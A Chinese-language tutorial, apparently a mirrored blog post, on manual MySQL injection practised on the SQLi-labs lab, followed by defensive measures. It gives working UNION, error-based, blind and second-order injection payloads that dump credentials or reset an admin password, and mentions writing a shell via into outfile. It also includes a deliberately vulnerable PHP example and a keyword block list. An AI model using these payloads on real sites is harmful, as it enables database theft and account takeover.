MySQL手工注入學習-1

時間 2020-01-15

標籤 mysql 手工注入學習欄目 MySQL 简体版

原文原文鏈接

MySQL手工注入學習

SQLi-labs 手工注入學習

如下是經過SLQi-labs平臺的部分簡單例題的手工注入過程php

Less-1：union聯合查詢注入

頁面提示：Please input the ID as parameter with numeric valuehtml

咱們首先構造id參數值：前端

http://192.168.2.198/sqli-labs-master/Less-1/?id=1' or 1=1--+

肯定存在注入點，並猜想SQL語句爲：mysql

select [字段] from [表] where [id]="$id";

猜解列數：

由於UNION聯合語句函數的格式要求，UNION後的聯合語句的回顯字段數要和UNION前的回顯列數一致……git

order by *

union select 1,2,……

爆表：

注意：id的value咱們須要給一個不存在結果的valuesql

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

group_concat()：將group by產生的同一個分組中的值鏈接起來，返回一個字符串結果shell

上段~將數據庫中的全部表名拼接成一個字符串返回數據庫

爆字段：

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' --+

爆數據：

union select 1,group_concat(id,0x7e,email_id),3 from emails --+

Less-1：報錯注入

爆表：

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))=1 --+

extractvalue(XML,XPath)從目標XML中返回包含查詢值得字符串瀏覽器

參數XML：String格式，爲XML文檔對象得名稱安全

參數XPath：xpath格式得字符串

由於咱們在xpath輸入的不是要求的xpath格式的字符串，因此函數會報錯返回xpath參數內容

xpath會被帶入mysql進行執行操做，發現不是xpath格式，可是隻有在執行後纔會發現，就會執行concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())sql代碼，查詢內容而且concat拼接字符串，隨後由extractvalue函數返回報錯~

爆字段：

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))=1 --+

爆數據：

and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)))=1 --+

從返回的結果發現問題，沒有顯示所有的字段信息；能夠利用篩選過濾條件來

and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users where username not in ('Dumb','Angelina'))))=1 --+

利用條件where約束來過濾掉咱們已知的字段信息，因而mysql在執行的時候就會越過Dumb和Angelina信息，顯示後面的信息……以此類推！咱們就能夠經過不斷的條件繞過回顯的模式來獲取全部內容！在不少狀況下咱們發現沒法徹底回顯內容，均可以利用這個方法來繞過已知字段信息

Less-2

經過判斷注入點的語句，判斷注入點爲數字型注入點：

?id=1 and 1=1 --+   #判斷數字型注入點
?id=1' and 1=1 --+  #判斷字符型注入點

union聯合注入爆表：

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

報錯注入報表：

?id=0 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

Less2的具體攻擊方法和Less1同樣，不一樣的是Less2是數字型注入，不須要單引號閉合

Less-3

判斷注入點

從報錯信息顯示，咱們的id—value寫在SQL語句的括號中，換言之就是，這條SQL語句缺乏一個右括號~

肯定注入點和方法策略後按照Less1/2的方法UNION/報錯注入方法

Less-4

判斷注入點

?id=1
?id=1'
?id=1')
?id=1" # 報錯…… ^

咱們的ID值會放在SQL語句中，且被("$id")包圍

?id=1") --+

手工盲注

按照這回顯，能夠認爲這是一處盲注……

SQL盲注點 ~~ UNION聯合(回顯)查詢的方法就不能夠了……

基於布爾的盲注

?id=1' and left(version(),1)='5' --+

left()：從左截取a結果的1個長度的字符

只有當and後面的sql語句爲True纔不會報錯~……

經過猜解的方式，利用left的方法猜解數據庫的版本信息第一個字符（環境是Mysql 5.1，因此版本信息第一個字符是‘5’）由此推演，咱們能夠利用布爾的判斷特性來猜解數據庫名……

如上~ 若是咱們不斷的對目標進行猜解，就能夠獲得數據庫名的第一個字符，以此類推第二個字符……第N個字符；數據庫名的長度也能夠經過length(database())>=*進行猜解

牢記布爾盲注的特色：只有當and後面的sql語句爲True纔不會報錯；報錯就表示and後的sql語句不成立……開動腦筋就能夠創造奇蹟

ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 #

ascii(substr((select database()),1,1))=98

substr(a,b,c) 將a結果從b開始截取c長度字符，ascii()將字符轉爲ascii值

基於報錯的盲注

XPath報錯注入：

?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0x7e) --+

基於時間的盲注

主要思路就是利用時間延遲來判斷布爾條件是否達成，本質上是利用時間延遲來進行布爾和報錯盲注的判斷依據條件；用於沒有任何回顯信息的時候使用~

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句，條件爲假，

?id=1' and if(ascii(substr(database(),1,1))=96,1,sleep(10)) --+

ascii()負責猜解；if()負責判斷，如果猜解成立則返回1，如果猜解不成立延遲10秒

從報錯結果中，看出註釋符應該被禁了……並且從報錯結果認定布爾和報錯注入是不可舉的！！！

於者乎……時間盲注是最優選擇~~~

固然了……還有在這裏說一說文件的導入於導出的方法:

Less-24 二次排序

*- 借鑑sqli-labs-24

分析環境文件：

login.php：查詢數據庫用戶存在和驗證登陸

黑客經過構造數據的形式，在瀏覽器或者其餘軟件中提交 HTTP 數據報文請求到服務
端進行處理，提交的數據報文請求中可能包含了黑客構造的 SQL 語句或者命令。
服務端應用程序會將黑客提交的數據信息進行存儲，一般是保存在數據庫中，保存的
數據信息的主要做用是爲應用程序執行其餘功能提供原始輸入數據並對客戶端請求作出響
應。
黑客向服務端發送第二個與第一次不相同的請求數據信息。
服務端接收到黑客提交的第二個請求信息後，爲了處理該請求，服務端會查詢數據中已經存儲的數據信息並處理，從而致使黑客在第一次請求中構造的 SQL 語句或者命令在服務端環境中執行。
服務端返回執行的處理結果數據信息，黑客能夠經過返回的結果數據信息判斷二次注
入漏洞利用是否成功。

在login_create.php註冊頁面中，使用了mysql_real_escape_string()可是數據仍是會被存放在數據庫中……

數據會被完整的記錄在數據庫中

數據庫中有了咱們的「小玩意」以後……

登陸咱們的帳戶，由於咱們的帳戶是以admin'#保存的，當然要這樣的去訪問和登陸

前端提交user和pass後，會在修改密碼頁面修改密碼

就這樣咱們成功的修改了admin的密碼！爲啥呢？

Sql 語句變爲 UPDATE users SET passwd=」New_Pass」 WHERE username =’ admin’ # ‘ AND password=’

也就是執行了 UPDATE users SET passwd=」New_Pass」 WHERE sername =’admin’

利用註冊的admin’# 修改密碼時候從數據庫提取該數據形成了數據命令拼接

注入漏洞能夠作哪些？

SQL注入能夠作什麼？若是從一個普通人的角度看，第一想起的就是「萬能密碼」即經過構造SQL注入語句繞過密碼驗證。

獲取數據庫信息

發現SQL注入點後，經過猜解的方式獲取當前數據庫的庫結構、表結構、字段內容，並經過Payload獲取服務器的物理路徑信息、用戶信息、敏感數據信息等，若是成功的得到了數據庫或服務器的高權限就能夠「拖庫」。
寫入Shell

經過SQL注入漏洞執行寫文件操做（寫入Shell），例如：loadfile() into outfile 等函數均可以實現讀寫本地文件。固然讀寫文件的先決條件：文件的讀寫權限、文件爲可讀屬性、瞭解文件的物理路徑等。

SQL注入防護策略

本文的SQL注入防護將會基於「常見SQL注入環境搭建(by:Mirror王宇陽)」中的搭建的環境作出防護措施。

過濾敏感字符

將經常使用的SQL注入字符寫入到黑名單中，而後經過程序對用戶提交的POST、GET請求以及請求中的各個字段都進行過濾檢查，篩選威脅字符。

# 部分敏感字符和字符串

delete from|from|count\(|drop table|update|truncate|mid\(|char\(|xp_cmdshell|exec master|netlocalgroup administrators|net user|[\{|\}|!|\']

# 前端處理
var str = "select * from table where id=123";
var reg = /(.*?((select)|(from)|(count)|(delete)|(update)|(drop)|(truncate)).*?){2,}/i;
return(reg.test(str));

在字符過濾方面，一般過濾空格、括號、引號……等特殊字符，可是這些能夠繞過的：

舉例：過濾空格 select/**/name/**/from/**/user/**/where/**/id='kk' 或 select(name)from(user)where(id='kk')經過這種方法就會規避對空格的過濾；過濾括號和引號select name from user wehere id=0x6b6b0x6b6b(kk的十六進制)

限制查詢長度

因爲SQL注入過程當中須要構造較長的SQL語句，所以，一些特定的程序可使用限制用戶提交的請求內容的長度來達到防護SQL注入的目的，但這種效果並很差。

// 接收參數text
if(isset($_GET['text']) && strlen($_GET['text']) < 10){
    $text=$_GET['text'];
} else {
    echo "輸入內容不符規範";
}

設置數據庫權限

根據程序要求爲特定的表設置特定的權限，如：某段程序對某表只需具有select權限便可，這樣即便程序存在問題，惡意用戶也沒法對錶進行update或insert等寫入操做。

限制目錄權限

WEB目錄應至少遵循「可寫目錄不可執行，可執行目錄不可寫」的原則，在次基礎上，對各目錄進行必要的權限細化。

限制數據類型

由於PHP語言沒有嚴格的限制數據類型的定義例如：「ID=1 就默認ID爲Intger ； name=kk 默認name爲string」在PHP的弱類型管理中這是不安全的。

舉例：

// 接收參數text
if(isset($_GET['text'])){
    $text=$_GET['text'];
}

// 拼接sql語句並執行
$sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1";
echo 'SQL拼接結果:'.$sql;
echo '<hr>';
// 執行sql語句並返回結果
$result=mysqli_query($conn, $sql);

這裏的text參數沒有限制咱們的輸入，理論上咱們的輸入應該限制爲「Intger」；當text接到' union select 1,database(),version(),4; -- +參數後就會自動推導text爲「String」類型並拼接爲SQL語句。

這裏可使用is_numeric() ctype_digit()函數判斷數據類型

is_numeric():檢測變量是否爲數字或數字字符串；指定的變量是數字和數字字符串則返回 TRUE，不然返回 FALSE。

if(isset($_GET['text']) && is_numeric($_GET['text'])){
    $text=$_GET['text'];
} else {
    echo "輸入內容不符規範";
}

ctype_digit():純數字檢測；對指定的變量檢測判斷是否爲連續且純數字的字符串(字符串離全爲數字)。

if(isset($_GET['text']) && ctype_digit($_GET['text'])){
    $text=$_GET['text'];
} else {
    echo "輸入內容不符規範";
}

缺陷：

這裏只能夠有效的預防數字型的注入點，而String類型的注入點此方法則無效。

限制特殊字符

在字符型注入點，任何惡意的SQL攻擊都會包含一些特殊的字符，例如空格、括號、引號……等。若是存在敏感的特殊字符，須要使用字符轉義。

使用轉義字符函數，防止SQL注入

過濾特殊字符函數：

function safe_replace($string)
    {
        $string = str_replace('%20', '', $string);
        $string = str_replace('%27', '', $string);
        $string = str_replace('%2527', '', $string);
        $string = str_replace('*', '', $string);
        $string = str_replace('"', '&quot;', $string);
        $string = str_replace("'", '', $string);
        $string = str_replace('"', '', $string);
        $string = str_replace(';', '', $string);
        $string = str_replace('<', '&lt;', $string);
        $string = str_replace('>', '&gt;', $string);
        $string = str_replace("{", '', $string);
        $string = str_replace('}', '', $string);
            ……  ……  ……  ……
        return $string;
    }

mysql_real_escape_string()函數:

對一些例如單引號、雙引號、反斜槓等特殊字符添加一個反斜槓以確保在查詢這些數據以前，用戶提供的輸入是乾淨的。但要注意，你是在鏈接數據庫的前提下使用這個函數。

addslashes()

這個函數的原理跟mysql_real_escape_string()類似。可是當在php.ini文件中，「magic_quotes_gpc「的值是「on」的時候，就不要使用這個函數。magic_quotes_gpc 的默認值是on，對全部的 GET、POST 和 COOKIE 數據自動運行 addslashes()。不要對已經被 magic_quotes_gpc 轉義過的字符串使用 addslashes()，由於這樣會致使雙層轉義。你可使用get_magic_quotes_gpc()函數來肯定它是否開啓。

htmlentities()

這個函數對於過濾用戶輸入的數據很是有用。它會將一些特殊字符轉換爲HTML實體。例如，用戶輸入<時，就會被該函數轉化爲HTML實體<（&lt），輸入>就被轉爲實體&gt.(HTML實體對照表：http://www.w3school.com.cn/html/html_entities.asp)，能夠防止XSS和SQL注入攻擊。